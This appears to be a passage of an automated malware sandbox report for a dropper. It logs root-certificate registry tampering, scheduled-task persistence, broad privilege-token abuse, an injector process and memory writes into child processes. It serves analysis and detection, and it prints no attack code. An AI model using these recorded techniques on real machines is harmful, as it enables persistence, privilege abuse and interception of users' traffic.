Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Program Files (x86)\Gparted\Build.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Program Files (x86)\Gparted\Build.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b80f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Program Files (x86)\Gparted\Build.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12536443c2c8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12536443c2c8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
N/A N/A C:\Program Files (x86)\Gparted\Build.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-D78U2.tmp\Tue129ba086d712.tmp N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue127d1be88dd70f8.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue127ff3b5477.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Gparted\Build.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2908 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe
PID 2908 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe
PID 2908 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe
PID 2908 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe
PID 2908 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe
PID 2908 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe
PID 2908 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe
PID 2692 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
